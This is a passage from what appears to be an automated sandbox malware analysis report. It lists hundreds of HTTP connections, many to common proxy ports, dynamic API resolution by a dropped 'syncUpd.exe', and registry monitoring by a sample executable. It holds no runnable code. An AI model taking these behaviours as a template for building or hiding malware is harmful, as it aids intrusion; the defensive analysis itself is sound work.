                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 88
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 10001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50587 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50676 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 55806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50727 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50709 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50506
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50599 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 32708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50747 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50635 -> 6012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50537
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50307
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 41368
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50677 -> 5566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9001 -> 50404
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1082 -> 50388
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50715 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50843 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50755 -> 10006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50775 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50819 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50345
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50320 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 45840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 1981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 36366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50737 -> 44268
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50597
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 9375
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50921 -> 35316
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50879 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50881 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50500
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8880 -> 50489
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50849 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 88 -> 50566
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 55005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 5003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 444
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32708 -> 50650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50895 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 34411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 7890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 15779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50991 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50917 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50789 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 50677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 46783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50951 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 35513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51159 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 46164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 48114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 8084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51051 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51141 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 44374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51228 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 14888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51118 -> 808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50248
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51099 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 17982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51104 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 4154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 29870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 5025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50376 -> 55443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 63625
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51221 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51329 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5484
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10089 -> 50985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51453 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 50915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 1131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9229 -> 50392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51440 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51260 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51308 -> 6002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 83
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50427 -> 54393
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51401 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 56755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 47851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51499 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14888 -> 51132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8084 -> 50975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51517 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 64309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 32770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 47152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51468
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51527 -> 21025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 10722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 58714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 34405
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51578 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 6012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51348
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51684 -> 46164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50484 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 15779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50643 -> 12266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 44374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51228 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51760 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51773 -> 42019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51635 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51371
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47851 -> 51457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5484
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51453 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47152 -> 51533
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 29870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51639 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 9005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 29249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51745 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51607 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50986 -> 5443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51696 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51726 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6002 -> 51308
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51653 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51762 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51613 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51783 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 27898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50729 -> 25847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51748 -> 5039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51806 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51811 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 10046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51785 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51824 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51808 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51829 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50862 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 14076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51831 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51823 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51578
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50905 -> 57377
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51509
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 33382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51837 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50936 -> 62289
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 50789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 38772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 31654
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00416240
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
